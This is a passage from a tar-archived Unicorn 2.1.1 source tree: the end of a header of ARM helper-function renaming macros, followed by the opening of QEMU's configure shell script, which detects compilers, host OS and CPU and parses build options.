helper_gvec_uqadd_b_arm #define helper_gvec_uqadd_h helper_gvec_uqadd_h_arm #define helper_gvec_uqadd_s helper_gvec_uqadd_s_arm #define helper_gvec_sqadd_b helper_gvec_sqadd_b_arm #define helper_gvec_sqadd_h helper_gvec_sqadd_h_arm #define helper_gvec_sqadd_s helper_gvec_sqadd_s_arm #define helper_gvec_uqsub_b helper_gvec_uqsub_b_arm #define helper_gvec_uqsub_h helper_gvec_uqsub_h_arm #define helper_gvec_uqsub_s helper_gvec_uqsub_s_arm #define helper_gvec_sqsub_b helper_gvec_sqsub_b_arm #define helper_gvec_sqsub_h helper_gvec_sqsub_h_arm #define helper_gvec_sqsub_s helper_gvec_sqsub_s_arm #define helper_gvec_uqadd_d helper_gvec_uqadd_d_arm #define helper_gvec_uqsub_d helper_gvec_uqsub_d_arm #define helper_gvec_sqadd_d helper_gvec_sqadd_d_arm #define helper_gvec_sqsub_d helper_gvec_sqsub_d_arm #define helper_gvec_fmlal_a32 helper_gvec_fmlal_a32_arm #define helper_gvec_fmlal_a64 helper_gvec_fmlal_a64_arm #define helper_gvec_fmlal_idx_a32 helper_gvec_fmlal_idx_a32_arm #define helper_gvec_fmlal_idx_a64 helper_gvec_fmlal_idx_a64_arm #define helper_gvec_sshl_b helper_gvec_sshl_b_arm #define helper_gvec_sshl_h helper_gvec_sshl_h_arm #define helper_gvec_ushl_b helper_gvec_ushl_b_arm #define helper_gvec_ushl_h helper_gvec_ushl_h_arm #define helper_gvec_pmul_b helper_gvec_pmul_b_arm #define helper_gvec_pmull_q helper_gvec_pmull_q_arm #define helper_neon_pmull_h helper_neon_pmull_h_arm #define helper_vfp_get_fpscr helper_vfp_get_fpscr_arm #define vfp_get_fpscr vfp_get_fpscr_arm #define helper_vfp_set_fpscr helper_vfp_set_fpscr_arm #define vfp_set_fpscr vfp_set_fpscr_arm #define helper_vfp_adds helper_vfp_adds_arm #define helper_vfp_addd helper_vfp_addd_arm #define helper_vfp_subs helper_vfp_subs_arm #define helper_vfp_subd helper_vfp_subd_arm #define helper_vfp_muls helper_vfp_muls_arm #define helper_vfp_muld helper_vfp_muld_arm #define helper_vfp_divs helper_vfp_divs_arm #define helper_vfp_divd helper_vfp_divd_arm #define helper_vfp_mins helper_vfp_mins_arm #define helper_vfp_mind helper_vfp_mind_arm #define helper_vfp_maxs helper_vfp_maxs_arm #define helper_vfp_maxd helper_vfp_maxd_arm #define helper_vfp_minnums helper_vfp_minnums_arm #define helper_vfp_minnumd helper_vfp_minnumd_arm #define helper_vfp_maxnums helper_vfp_maxnums_arm #define helper_vfp_maxnumd helper_vfp_maxnumd_arm #define helper_vfp_negs helper_vfp_negs_arm #define helper_vfp_negd helper_vfp_negd_arm #define helper_vfp_abss helper_vfp_abss_arm #define helper_vfp_absd helper_vfp_absd_arm #define helper_vfp_sqrts helper_vfp_sqrts_arm #define helper_vfp_sqrtd helper_vfp_sqrtd_arm #define helper_vfp_cmps helper_vfp_cmps_arm #define helper_vfp_cmpes helper_vfp_cmpes_arm #define helper_vfp_cmpd helper_vfp_cmpd_arm #define helper_vfp_cmped helper_vfp_cmped_arm #define helper_vfp_sitoh helper_vfp_sitoh_arm #define helper_vfp_tosih helper_vfp_tosih_arm #define helper_vfp_tosizh helper_vfp_tosizh_arm #define helper_vfp_sitos helper_vfp_sitos_arm #define helper_vfp_tosis helper_vfp_tosis_arm #define helper_vfp_tosizs helper_vfp_tosizs_arm #define helper_vfp_sitod helper_vfp_sitod_arm #define helper_vfp_tosid helper_vfp_tosid_arm #define helper_vfp_tosizd helper_vfp_tosizd_arm #define helper_vfp_uitoh helper_vfp_uitoh_arm #define helper_vfp_touih helper_vfp_touih_arm #define helper_vfp_touizh helper_vfp_touizh_arm #define helper_vfp_uitos helper_vfp_uitos_arm #define helper_vfp_touis helper_vfp_touis_arm #define helper_vfp_touizs helper_vfp_touizs_arm #define helper_vfp_uitod helper_vfp_uitod_arm #define helper_vfp_touid helper_vfp_touid_arm #define helper_vfp_touizd helper_vfp_touizd_arm #define helper_vfp_fcvtds helper_vfp_fcvtds_arm #define helper_vfp_fcvtsd helper_vfp_fcvtsd_arm #define helper_vfp_shtod helper_vfp_shtod_arm #define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_arm #define helper_vfp_toshd helper_vfp_toshd_arm #define helper_vfp_sltod helper_vfp_sltod_arm #define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_arm #define helper_vfp_tosld helper_vfp_tosld_arm #define helper_vfp_sqtod helper_vfp_sqtod_arm #define helper_vfp_tosqd helper_vfp_tosqd_arm #define helper_vfp_uhtod helper_vfp_uhtod_arm #define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_arm #define helper_vfp_touhd helper_vfp_touhd_arm #define helper_vfp_ultod helper_vfp_ultod_arm #define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_arm #define helper_vfp_tould helper_vfp_tould_arm #define helper_vfp_uqtod helper_vfp_uqtod_arm #define helper_vfp_touqd helper_vfp_touqd_arm #define helper_vfp_shtos helper_vfp_shtos_arm #define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_arm #define helper_vfp_toshs helper_vfp_toshs_arm #define helper_vfp_sltos helper_vfp_sltos_arm #define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_arm #define helper_vfp_tosls helper_vfp_tosls_arm #define helper_vfp_sqtos helper_vfp_sqtos_arm #define helper_vfp_tosqs helper_vfp_tosqs_arm #define helper_vfp_uhtos helper_vfp_uhtos_arm #define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_arm #define helper_vfp_touhs helper_vfp_touhs_arm #define helper_vfp_ultos helper_vfp_ultos_arm #define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_arm #define helper_vfp_touls helper_vfp_touls_arm #define helper_vfp_uqtos helper_vfp_uqtos_arm #define helper_vfp_touqs helper_vfp_touqs_arm #define helper_vfp_sltoh helper_vfp_sltoh_arm #define helper_vfp_ultoh helper_vfp_ultoh_arm #define helper_vfp_sqtoh helper_vfp_sqtoh_arm #define helper_vfp_uqtoh helper_vfp_uqtoh_arm #define helper_vfp_toshh helper_vfp_toshh_arm #define helper_vfp_touhh helper_vfp_touhh_arm #define helper_vfp_toslh helper_vfp_toslh_arm #define helper_vfp_toulh helper_vfp_toulh_arm #define helper_vfp_tosqh helper_vfp_tosqh_arm #define helper_vfp_touqh helper_vfp_touqh_arm #define helper_set_rmode helper_set_rmode_arm #define helper_set_neon_rmode helper_set_neon_rmode_arm #define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_arm #define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_arm #define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_arm #define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_arm #define helper_recps_f32 helper_recps_f32_arm #define helper_rsqrts_f32 helper_rsqrts_f32_arm #define helper_recpe_f16 helper_recpe_f16_arm #define helper_recpe_f32 helper_recpe_f32_arm #define helper_recpe_f64 helper_recpe_f64_arm #define helper_rsqrte_f16 helper_rsqrte_f16_arm #define helper_rsqrte_f32 helper_rsqrte_f32_arm #define helper_rsqrte_f64 helper_rsqrte_f64_arm #define helper_recpe_u32 helper_recpe_u32_arm #define helper_rsqrte_u32 helper_rsqrte_u32_arm #define helper_vfp_muladds helper_vfp_muladds_arm #define helper_vfp_muladdd helper_vfp_muladdd_arm #define helper_rints_exact helper_rints_exact_arm #define helper_rintd_exact helper_rintd_exact_arm #define helper_rints helper_rints_arm #define helper_rintd helper_rintd_arm #define arm_rmode_to_sf arm_rmode_to_sf_arm #define helper_fjcvtzs helper_fjcvtzs_arm #define helper_vjcvt helper_vjcvt_arm #define helper_frint32_s helper_frint32_s_arm #define helper_frint64_s helper_frint64_s_arm #define helper_frint32_d helper_frint32_d_arm #define helper_frint64_d helper_frint64_d_arm #define helper_check_hcr_el2_trap helper_check_hcr_el2_trap_arm #define mla_op mla_op_arm #define mls_op mls_op_arm #define sshl_op sshl_op_arm #define ushl_op ushl_op_arm #define uqsub_op uqsub_op_arm #define sqsub_op sqsub_op_arm #define uqadd_op uqadd_op_arm #define sqadd_op sqadd_op_arm #define sli_op sli_op_arm #define cmtst_op cmtst_op_arm #define sri_op sri_op_arm #define usra_op usra_op_arm #define ssra_op ssra_op_arm #endif ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/configure������������������������������������������������������������������������0000775�0000000�0000000�00000221603�14675241067�0016066�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/bin/sh # # qemu configure script (c) 2003 Fabrice Bellard # # Unset some variables known to interfere with behavior of common tools, # just as autoconf does. CLICOLOR_FORCE= GREP_OPTIONS= unset CLICOLOR_FORCE GREP_OPTIONS # Don't allow CCACHE, if present, to use cached results of compile tests! export CCACHE_RECACHE=yes # Temporary directory used for files created while # configure runs. Since it is in the build directory # we can safely blow away any previous version of it # (and we need not jump through hoops to try to delete # it when configure exits.) TMPDIR1="config-temp" rm -rf "${TMPDIR1}" mkdir -p "${TMPDIR1}" if [ $? -ne 0 ]; then echo "ERROR: failed to create temporary directory" exit 1 fi TMPB="qemu-conf" TMPC="${TMPDIR1}/${TMPB}.c" TMPO="${TMPDIR1}/${TMPB}.o" TMPCXX="${TMPDIR1}/${TMPB}.cxx" TMPE="${TMPDIR1}/${TMPB}.exe" TMPMO="${TMPDIR1}/${TMPB}.mo" TMPTXT="${TMPDIR1}/${TMPB}.txt" rm -f config.log # Print a helpful header at the top of config.log echo "# QEMU configure log $(date)" >> config.log printf "# Configured with:" >> config.log printf " '%s'" "$0" "$@" >> config.log echo >> config.log echo "#" >> config.log print_error() { (echo echo "ERROR: $1" while test -n "$2"; do echo " $2" shift done echo) >&2 } error_exit() { print_error "$@" exit 1 } do_compiler() { # Run the compiler, capturing its output to the log. First argument # is compiler binary to execute. local compiler="$1" shift if test -n "$BASH_VERSION"; then eval ' echo >>config.log " funcs: ${FUNCNAME[*]} lines: ${BASH_LINENO[*]}" '; fi echo $compiler "$@" >> config.log $compiler "$@" >> config.log 2>&1 || return $? # Test passed. If this is an --enable-werror build, rerun # the test with -Werror and bail out if it fails. This # makes warning-generating-errors in configure test code # obvious to developers. if test "$werror" != "yes"; then return 0 fi # Don't bother rerunning the compile if we were already using -Werror case "$*" in *-Werror*) return 0 ;; esac echo $compiler -Werror "$@" >> config.log $compiler -Werror "$@" >> config.log 2>&1 && return $? error_exit "configure test passed without -Werror but failed with -Werror." \ "This is probably a bug in the configure script. The failing command" \ "will be at the bottom of config.log." \ "You can run configure with --disable-werror to bypass this check." } do_cc() { do_compiler "$cc" "$@" } do_cxx() { do_compiler "$cxx" "$@" } update_cxxflags() { # Set QEMU_CXXFLAGS from QEMU_CFLAGS by filtering out those # options which some versions of GCC's C++ compiler complain about # because they only make sense for C programs. QEMU_CXXFLAGS="$QEMU_CXXFLAGS -D__STDC_LIMIT_MACROS -D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS" for arg in $QEMU_CFLAGS; do case $arg in -Wstrict-prototypes|-Wmissing-prototypes|-Wnested-externs|\ -Wold-style-declaration|-Wold-style-definition|-Wredundant-decls) ;; -std=gnu99) QEMU_CXXFLAGS=${QEMU_CXXFLAGS:+$QEMU_CXXFLAGS }"-std=gnu++98" ;; *) QEMU_CXXFLAGS=${QEMU_CXXFLAGS:+$QEMU_CXXFLAGS }$arg ;; esac done } compile_object() { local_cflags="$1" do_cc $QEMU_CFLAGS $local_cflags -c -o $TMPO $TMPC } compile_prog() { local_cflags="$1" local_ldflags="$2" do_cc $QEMU_CFLAGS $local_cflags -o $TMPE $TMPC $QEMU_LDFLAGS $local_ldflags } # symbolically link $1 to $2. Portable version of "ln -sf". symlink() { rm -rf "$2" mkdir -p "$(dirname "$2")" ln -s "$1" "$2" } # check whether a command is available to this shell (may be either an # executable or a builtin) has() { type "$1" >/dev/null 2>&1 } # search for an executable in PATH path_of() { local_command="$1" local_ifs="$IFS" local_dir="" # pathname has a dir component? if [ "${local_command#*/}" != "$local_command" ]; then if [ -x "$local_command" ] && [ ! -d "$local_command" ]; then echo "$local_command" return 0 fi fi if [ -z "$local_command" ]; then return 1 fi IFS=: for local_dir in $PATH; do if [ -x "$local_dir/$local_command" ] && [ ! -d "$local_dir/$local_command" ]; then echo "$local_dir/$local_command" IFS="${local_ifs:-$(printf ' \t\n')}" return 0 fi done # not found IFS="${local_ifs:-$(printf ' \t\n')}" return 1 } glob() { eval test -z '"${1#'"$2"'}"' } supported_target() { case "$1" in *-softmmu) ;; *) print_error "Invalid target name '$target'" return 1 ;; esac test "$tcg" = "yes" && return 0 print_error "TCG disabled, but hardware accelerator not available for '$target'" return 1 } ld_has() { $ld --help 2>/dev/null | grep ".$1" >/dev/null 2>&1 } # make source path absolute source_path=$(cd "$(dirname -- "$0")"; pwd) if printf %s\\n "$source_path" "$PWD" | grep -q "[[:space:]:]"; then error_exit "main directory cannot contain spaces nor colons" fi # default parameters cpu="" iasl="iasl" interp_prefix="/usr/gnemul/qemu-%M" static="no" cross_prefix="" host_cc="cc" libs_cpu="" libs_softmmu="" libs_tools="" debug_info="yes" stack_protector="" git_update=no git_submodules="" git="git" # Don't accept a target_list environment variable. unset target_list unset target_list_exclude # Default value for a variable defining feature "foo". # * foo="no" feature will only be used if --enable-foo arg is given # * foo="" feature will be searched for, and if found, will be used # unless --disable-foo is given # * foo="yes" this value will only be set by --enable-foo flag. # feature will searched for, # if not found, configure exits with error # # Always add --enable-foo and --disable-foo command line args. # Distributions want to ensure that several features are compiled in, and it # is impossible without a --enable-foo that exits if a feature is not found. tcg="yes" membarrier="" debug="no" sanitizers="no" strip_opt="yes" bigendian="no" mingw32="no" EXESUF="" DSOSUF=".so" LDFLAGS_SHARED="-shared" prefix="/usr/local" bindir="\${prefix}/bin" libdir="\${prefix}/lib" libexecdir="\${prefix}/libexec" includedir="\${prefix}/include" sysconfdir="\${prefix}/etc" local_statedir="\${prefix}/var" confsuffix="/qemu" bsd="no" linux="no" solaris="no" softmmu="yes" pkgversion="" pie="" cpuid_h="no" avx2_opt="" debug_stack_usage="no" gtk_gl="no" tcmalloc="no" jemalloc="no" supported_cpu="no" supported_os="no" bogus_os="no" malloc_trim="" # parse CC options first for opt do optarg=$(expr "x$opt" : 'x[^=]*=\(.*\)') case "$opt" in --cross-prefix=*) cross_prefix="$optarg" ;; --cc=*) CC="$optarg" ;; --cxx=*) CXX="$optarg" ;; --cpu=*) cpu="$optarg" ;; --extra-cflags=*) QEMU_CFLAGS="$QEMU_CFLAGS $optarg" QEMU_LDFLAGS="$QEMU_LDFLAGS $optarg" ;; --extra-cxxflags=*) QEMU_CXXFLAGS="$QEMU_CXXFLAGS $optarg" ;; --extra-ldflags=*) QEMU_LDFLAGS="$QEMU_LDFLAGS $optarg" EXTRA_LDFLAGS="$optarg" ;; --enable-debug-info) debug_info="yes" ;; --disable-debug-info) debug_info="no" ;; --cross-cc-*[!a-zA-Z0-9_-]*=*) error_exit "Passed bad --cross-cc-FOO option" ;; --cross-cc-cflags-*) cc_arch=${opt#--cross-cc-flags-}; cc_arch=${cc_arch%%=*} eval "cross_cc_cflags_${cc_arch}=\$optarg" cross_cc_vars="$cross_cc_vars cross_cc_cflags_${cc_arch}" ;; --cross-cc-*) cc_arch=${opt#--cross-cc-}; cc_arch=${cc_arch%%=*} cc_archs="$cc_archs $cc_arch" eval "cross_cc_${cc_arch}=\$optarg" cross_cc_vars="$cross_cc_vars cross_cc_${cc_arch}" ;; esac done # OS specific # Using uname is really, really broken. Once we have the right set of checks # we can eliminate its usage altogether. # Preferred compiler: # ${CC} (if set) # ${cross_prefix}gcc (if cross-prefix specified) # system compiler if test -z "${CC}${cross_prefix}"; then cc="$host_cc" else cc="${CC-${cross_prefix}gcc}" fi if test -z "${CXX}${cross_prefix}"; then cxx="c++" else cxx="${CXX-${cross_prefix}g++}" fi ar="${AR-${cross_prefix}ar}" as="${AS-${cross_prefix}as}" ccas="${CCAS-$cc}" cpp="${CPP-$cc -E}" objcopy="${OBJCOPY-${cross_prefix}objcopy}" ld="${LD-${cross_prefix}ld}" ranlib="${RANLIB-${cross_prefix}ranlib}" nm="${NM-${cross_prefix}nm}" strip="${STRIP-${cross_prefix}strip}" pkg_config_exe="${PKG_CONFIG-${cross_prefix}pkg-config}" query_pkg_config() { "${pkg_config_exe}" ${QEMU_PKG_CONFIG_FLAGS} "$@" } pkg_config=query_pkg_config # If the user hasn't specified ARFLAGS, default to 'rv', just as make does. ARFLAGS="${ARFLAGS-rv}" # default flags for all hosts # We use -fwrapv to tell the compiler that we require a C dialect where # left shift of signed integers is well defined and has the expected # 2s-complement style results. (Both clang and gcc agree that it # provides these semantics.) QEMU_CFLAGS="-fno-strict-aliasing -fno-common -fwrapv -std=gnu99 $QEMU_CFLAGS" QEMU_CFLAGS="-Wall -Wundef -Wwrite-strings -Wmissing-prototypes $QEMU_CFLAGS" QEMU_CFLAGS="-Wstrict-prototypes -Wredundant-decls $QEMU_CFLAGS" QEMU_CFLAGS="-D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE $QEMU_CFLAGS" QEMU_INCLUDES="-iquote . -iquote \$(SRC_PATH) -iquote \$(SRC_PATH)/accel/tcg -iquote \$(SRC_PATH)/include" QEMU_INCLUDES="$QEMU_INCLUDES -iquote \$(SRC_PATH)/disas/libvixl" if test "$debug_info" = "yes"; then CFLAGS="-g $CFLAGS" fi # running configure in the source tree? # we know that's the case if configure is there. if test -f "./configure"; then pwd_is_source_path="y" else pwd_is_source_path="n" fi check_define() { cat > $TMPC <<EOF #if !defined($1) #error $1 not defined #endif int main(void) { return 0; } EOF compile_object } check_include() { cat > $TMPC <<EOF #include <$1> int main(void) { return 0; } EOF compile_object } write_c_skeleton() { cat > $TMPC <<EOF int main(void) { return 0; } EOF } if check_define __linux__ ; then targetos="Linux" elif check_define _WIN32 ; then targetos='MINGW32' elif check_define __OpenBSD__ ; then targetos='OpenBSD' elif check_define __sun__ ; then targetos='SunOS' elif check_define __HAIKU__ ; then targetos='Haiku' elif check_define __FreeBSD__ ; then targetos='FreeBSD' elif check_define __FreeBSD_kernel__ && check_define __GLIBC__; then targetos='GNU/kFreeBSD' elif check_define __DragonFly__ ; then targetos='DragonFly' elif check_define __NetBSD__; then targetos='NetBSD' elif check_define __APPLE__; then targetos='Darwin' else # This is a fatal error, but don't report it yet, because we # might be going to just print the --help text, or it might # be the result of a missing compiler. targetos='bogus' bogus_os='yes' fi # Some host OSes need non-standard checks for which CPU to use. # Note that these checks are broken for cross-compilation: if you're # cross-compiling to one of these OSes then you'll need to specify # the correct CPU with the --cpu option. case $targetos in Darwin) # on Leopard most of the system is 32-bit, so we have to ask the kernel if we can # run 64-bit userspace code. # If the user didn't specify a CPU explicitly and the kernel says this is # 64 bit hw, then assume x86_64. Otherwise fall through to the usual detection code. if test -z "$cpu" && test "$(sysctl -n hw.optional.x86_64)" = "1"; then cpu="x86_64" fi ;; SunOS) # $(uname -m) returns i86pc even on an x86_64 box, so default based on isainfo if test -z "$cpu" && test "$(isainfo -k)" = "amd64"; then cpu="x86_64" fi esac if test ! -z "$cpu" ; then # command line argument : elif check_define __i386__ ; then cpu="i386" elif check_define __x86_64__ ; then if check_define __ILP32__ ; then cpu="x32" else cpu="x86_64" fi elif check_define __sparc__ ; then if check_define __arch64__ ; then cpu="sparc64" else cpu="sparc" fi elif check_define _ARCH_PPC ; then if check_define _ARCH_PPC64 ; then if check_define _LITTLE_ENDIAN ; then cpu="ppc64le" else cpu="ppc64" fi else cpu="ppc" fi elif check_define __mips__ ; then cpu="mips" elif check_define __s390__ ; then if check_define __s390x__ ; then cpu="s390x" else cpu="s390" fi elif check_define __riscv ; then if check_define _LP64 ; then cpu="riscv64" else cpu="riscv32" fi elif check_define __arm__ ; then cpu="arm" elif check_define __aarch64__ ; then cpu="aarch64" elif check_define __tricore__ ; then cpu="tricore" else cpu=$(uname -m) fi ARCH= # Normalise host CPU name and set ARCH. # Note that this case should only have supported host CPUs, not guests. case "$cpu" in ppc|ppc64|s390x|sparc64|x32|riscv32|riscv64) supported_cpu="yes" ;; ppc64le) ARCH="ppc64" supported_cpu="yes" ;; i386|i486|i586|i686|i86pc|BePC) cpu="i386" supported_cpu="yes" ;; x86_64|amd64) cpu="x86_64" supported_cpu="yes" ;; armv*b|armv*l|arm) cpu="arm" supported_cpu="yes" ;; aarch64) cpu="aarch64" supported_cpu="yes" ;; mips*) cpu="mips" supported_cpu="yes" ;; sparc|sun4[cdmuv]) cpu="sparc" supported_cpu="yes" ;; tricore) cpu="tricore" supported_cpu="yes" ;; *) # This will result in either an error or falling back to TCI later ARCH=unknown ;; esac if test -z "$ARCH"; then ARCH="$cpu" fi # OS specific # host *BSD for user mode HOST_VARIANT_DIR="" case $targetos in MINGW32*) mingw32="yes" supported_os="yes" pie="no" ;; GNU/kFreeBSD) bsd="yes" ;; FreeBSD) bsd="yes" make="${MAKE-gmake}" # needed for kinfo_getvmmap(3) in libutil.h LIBS="-lutil $LIBS" # needed for kinfo_getproc HOST_VARIANT_DIR="freebsd" supported_os="yes" ;; DragonFly) bsd="yes" make="${MAKE-gmake}" HOST_VARIANT_DIR="dragonfly" ;; NetBSD) bsd="yes" make="${MAKE-gmake}" HOST_VARIANT_DIR="netbsd" supported_os="yes" ;; OpenBSD) bsd="yes" make="${MAKE-gmake}" HOST_VARIANT_DIR="openbsd" supported_os="yes" ;; Darwin) bsd="yes" darwin="yes" LDFLAGS_SHARED="-bundle -undefined dynamic_lookup" if [ "$cpu" = "x86_64" ] ; then QEMU_CFLAGS="-arch x86_64 $QEMU_CFLAGS" QEMU_LDFLAGS="-arch x86_64 $QEMU_LDFLAGS" fi QEMU_LDFLAGS="-framework CoreFoundation -framework IOKit $QEMU_LDFLAGS" libs_softmmu="-F/System/Library/Frameworks -framework -framework IOKit $libs_softmmu" # Disable attempts to use ObjectiveC features in os/object.h since they # won't work when we're compiling with gcc as a C compiler. QEMU_CFLAGS="-DOS_OBJECT_USE_OBJC=0 $QEMU_CFLAGS" HOST_VARIANT_DIR="darwin" supported_os="yes" ;; SunOS) solaris="yes" make="${MAKE-gmake}" install="${INSTALL-ginstall}" # needed for CMSG_ macros in sys/socket.h QEMU_CFLAGS="-D_XOPEN_SOURCE=600 $QEMU_CFLAGS" # needed for TIOCWIN* defines in termios.h QEMU_CFLAGS="-D__EXTENSIONS__ $QEMU_CFLAGS" QEMU_CFLAGS="-std=gnu99 $QEMU_CFLAGS" solarisnetlibs="-lsocket -lnsl -lresolv" LIBS="$solarisnetlibs $LIBS" ;; Haiku) haiku="yes" QEMU_CFLAGS="-DB_USE_POSITIVE_POSIX_ERRORS $QEMU_CFLAGS" LIBS="-lposix_error_mapper -lnetwork $LIBS" ;; Linux) linux="yes" QEMU_INCLUDES="-isystem \$(SRC_PATH)/linux-headers -isystem $PWD/linux-headers $QEMU_INCLUDES" supported_os="yes" ;; esac : ${make=${MAKE-make}} : ${install=${INSTALL-install}} # Default objcc to clang if available, otherwise use CC if has clang; then objcc=clang else objcc="$cc" fi if test "$mingw32" = "yes" ; then EXESUF=".exe" DSOSUF=".dll" # MinGW needs -mthreads for TLS and macro _MT. QEMU_CFLAGS="-mthreads $QEMU_CFLAGS" LIBS="-lwinmm -lws2_32 $LIBS" write_c_skeleton; if compile_prog "" "-liberty" ; then LIBS="-liberty $LIBS" fi prefix="c:/Program Files/QEMU" bindir="\${prefix}" sysconfdir="\${prefix}" local_statedir= confsuffix="" fi werror="" for opt do optarg=$(expr "x$opt" : 'x[^=]*=\(.*\)') case "$opt" in --help|-h) show_help=yes ;; --version|-V) exec cat $source_path/VERSION ;; --prefix=*) prefix="$optarg" ;; --interp-prefix=*) interp_prefix="$optarg" ;; --cross-prefix=*) ;; --cc=*) ;; --host-cc=*) host_cc="$optarg" ;; --cxx=*) ;; --iasl=*) iasl="$optarg" ;; --objcc=*) objcc="$optarg" ;; --make=*) make="$optarg" ;; --install=*) install="$optarg" ;; --extra-cflags=*) ;; --extra-cxxflags=*) ;; --extra-ldflags=*) ;; --enable-debug-info) ;; --disable-debug-info) ;; --cross-cc-*) ;; --cpu=*) ;; --target-list=*) target_list="$optarg" if test "$target_list_exclude"; then error_exit "Can't mix --target-list with --target-list-exclude" fi ;; --target-list-exclude=*) target_list_exclude="$optarg" if test "$target_list"; then error_exit "Can't mix --target-list-exclude with --target-list" fi ;; --static) static="yes" QEMU_PKG_CONFIG_FLAGS="--static $QEMU_PKG_CONFIG_FLAGS" ;; --bindir=*) bindir="$optarg" ;; --libdir=*) libdir="$optarg" ;; --libexecdir=*) libexecdir="$optarg" ;; --includedir=*) includedir="$optarg" ;; --with-confsuffix=*) confsuffix="$optarg" ;; --sysconfdir=*) sysconfdir="$optarg" ;; --localstatedir=*) local_statedir="$optarg" ;; --host=*|--build=*|\ --disable-dependency-tracking|\ --sbindir=*|--sharedstatedir=*|\ --oldincludedir=*|--datarootdir=*|--infodir=*|--localedir=*|\ --htmldir=*|--dvidir=*|--pdfdir=*|--psdir=*) # These switches are silently ignored, for compatibility with # autoconf-generated configure scripts. This allows QEMU's # configure to be used by RPM and similar macros that set # lots of directory switches by default. ;; --enable-debug) # Enable debugging options that aren't excessively noisy debug="yes" strip_opt="no" ;; --enable-sanitizers) sanitizers="yes" ;; --disable-sanitizers) sanitizers="no" ;; --disable-strip) strip_opt="no" ;; --disable-tcg) tcg="no" ;; --enable-tcg) tcg="yes" ;; --disable-malloc-trim) malloc_trim="no" ;; --enable-malloc-trim) malloc_trim="yes" ;; --enable-system) softmmu="yes" ;; --enable-pie) pie="yes" ;; --disable-pie) pie="no" ;; --enable-werror) werror="yes" ;; --disable-werror) werror="no" ;; --enable-stack-protector) stack_protector="yes" ;; --disable-stack-protector) stack_protector="no" ;; --disable-membarrier) membarrier="no" ;; --enable-membarrier) membarrier="yes" ;; --with-pkgversion=*) pkgversion="$optarg" ;; --enable-debug-stack-usage) debug_stack_usage="yes" ;; --disable-avx2) avx2_opt="no" ;; --enable-avx2) avx2_opt="yes" ;; --disable-avx512f) avx512f_opt="no" ;; --enable-avx512f) avx512f_opt="yes" ;; --disable-virtio-blk-data-plane|--enable-virtio-blk-data-plane) echo "$0: $opt is obsolete, virtio-blk data-plane is always on" >&2 ;; --enable-vhdx|--disable-vhdx) echo "$0: $opt is obsolete, VHDX driver is always built" >&2 ;; --enable-uuid|--disable-uuid) echo "$0: $opt is obsolete, UUID support is always built" >&2 ;; --disable-tcmalloc) tcmalloc="no" ;; --enable-tcmalloc) tcmalloc="yes" ;; --disable-jemalloc) jemalloc="no" ;; --enable-jemalloc) jemalloc="yes" ;; --with-git=*) git="$optarg" ;; *) echo "ERROR: unknown option $opt" echo "Try '$0 --help' for more information" exit 1 ;; esac done case "$cpu" in ppc) CPU_CFLAGS="-m32" QEMU_LDFLAGS="-m32 $QEMU_LDFLAGS" ;; ppc64) CPU_CFLAGS="-m64" QEMU_LDFLAGS="-m64 $QEMU_LDFLAGS" ;; sparc) CPU_CFLAGS="-m32 -mv8plus -mcpu=ultrasparc" QEMU_LDFLAGS="-m32 -mv8plus $QEMU_LDFLAGS" ;; sparc64) CPU_CFLAGS="-m64 -mcpu=ultrasparc" QEMU_LDFLAGS="-m64 $QEMU_LDFLAGS" ;; s390) CPU_CFLAGS="-m31" QEMU_LDFLAGS="-m31 $QEMU_LDFLAGS" ;; s390x) CPU_CFLAGS="-m64" QEMU_LDFLAGS="-m64 $QEMU_LDFLAGS" ;; i386) CPU_CFLAGS="-m32" QEMU_LDFLAGS="-m32 $QEMU_LDFLAGS" ;; x86_64) # ??? Only extremely old AMD cpus do not have cmpxchg16b. # If we truly care, we should simply detect this case at # runtime and generate the fallback to serial emulation. CPU_CFLAGS="-m64 -mcx16" QEMU_LDFLAGS="-m64 $QEMU_LDFLAGS" ;; x32) CPU_CFLAGS="-mx32" QEMU_LDFLAGS="-mx32 $QEMU_LDFLAGS" ;; # No special flags required for other host CPUs esac eval "cross_cc_${cpu}=\$host_cc" cross_cc_vars="$cross_cc_vars cross_cc_${cpu}" QEMU_CFLAGS="$CPU_CFLAGS $QEMU_CFLAGS" default_target_list="aarch64-softmmu \ arm-softmmu m68k-softmmu mips64el-softmmu mips64-softmmu mipsel-softmmu \ mips-softmmu ppc64-softmmu ppc-softmmu sparc64-softmmu sparc-softmmu \ x86_64-softmmu riscv32-softmmu riscv64-softmmu s390x-softmmu \ tricore-softmmu" if test x"$show_help" = x"yes" ; then cat << EOF Usage: configure [options] Options: [defaults in brackets after descriptions] Standard options: --help print this message --prefix=PREFIX install in PREFIX [$prefix] --interp-prefix=PREFIX where to find shared libraries, etc. use %M for cpu name [$interp_prefix] --target-list=LIST set target list (default: build everything) $(echo Available targets: $default_target_list | \ fold -s -w 53 | sed -e 's/^/ /') --target-list-exclude=LIST exclude a set of targets from the default target-list Advanced options (experts only): --cross-prefix=PREFIX use PREFIX for compile tools [$cross_prefix] --cc=CC use C compiler CC [$cc] --iasl=IASL use ACPI compiler IASL [$iasl] --host-cc=CC use C compiler CC [$host_cc] for code run at build time --cxx=CXX use C++ compiler CXX [$cxx] --objcc=OBJCC use Objective-C compiler OBJCC [$objcc] --extra-cflags=CFLAGS append extra C compiler flags QEMU_CFLAGS --extra-cxxflags=CXXFLAGS append extra C++ compiler flags QEMU_CXXFLAGS 